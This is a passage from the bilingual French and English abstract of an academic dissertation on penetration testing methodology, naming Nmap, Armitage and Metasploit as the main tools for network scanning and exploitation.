peuvent utiliser contre leur réseau ou leur système. Certains de ces outils sont «Nmap», qui été
utilisé pour la surveillance réseau et le scan de ports, « Armitage » et « Metasploit-Framework »
ont été utilisés en tant que scanners de vulnérabilité et Framework d'exploitation. Ce sont les
outils les plus importants, qui devraient être utilisés lors d’un test d’intrusion.

Mots clés : Audit, Détection, Vulnérabilité, Intrusion, Sécurité, Attaques, Metasploit, Armitage, Nmap

Abstract
In today's distributed computing environment where computer networks and Internet are
medium of communication and exchange of information, Security is now a basic requirement
because distributed computing is simply insecure. There exist different security measures which
network administrators can use to secure the network or system, however, the best way to ensure
the security of a network or a system is to perform penetration testing.
During our dissertation we have identified and explained a suitable methodology behind
the penetration testing. We have also illustrated free and open source tools and techniques to
simulate an attack that the Network and System Administrators can use against their network or
system. Some of those tools are «Nmap» which was used for Network surveying and port
scanning; « Armitage » and « Metasploit-Framework » were used as vulnerability scanners and
exploitation framework. These were the most important tools, which should be used during a
penetration test.

Keywords: Audit, Detection, Vulnerability, Intrusion, Security, Attacks, Metasploit, Armitage, Nmap

Vous aimerez peut-être aussi